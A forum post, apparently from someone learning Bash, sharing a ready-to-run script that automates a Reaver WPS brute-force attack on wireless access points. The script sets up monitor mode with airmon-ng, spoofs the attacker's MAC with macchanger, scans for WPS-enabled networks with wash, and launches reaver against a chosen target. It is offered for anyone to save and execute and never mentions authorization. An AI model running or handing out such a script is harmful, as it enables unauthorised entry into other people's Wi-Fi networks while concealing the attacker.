Reaver Script (Bash)

Battery_

I'm just learning how to Bash Script so I decided to make a nice and easy Reaver for idiots script. Let me know what you guys think or if anything else should be added, or any suggestions on the code. Just using this as a launch off point to learn stuff and eventually hopefully a full module for the pineapple.

Just save the below to a file and execute

#!/bin/bash
clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read setup
if [[ $setup == 'y' ]]; then
#Setup the monitor interface
echo "[+] What Wireless interfaces do we have..."
iwconfig
echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
read interface
if [[ $interface == '' ]]; then
interface=wlan0 #Default to wlan0
fi
echo "[+] Starting monitor Mode for $interface"
airmon-ng start $interface
iwconfig
fi #End Mon Mode Setup Portion
#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read monInterface
if [[ $monInterface == '' ]]; then
monInterface=mon0 #Default to mon0
fi
#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig $monInterface down
macchanger -r $monInterface
ifconfig $monInterface up
#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i $monInterface
#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read target
#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
read reaverVars
#Start REAVERINGGGGG!!!!
echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
reaver -i $monInterface -b $target $reaverVars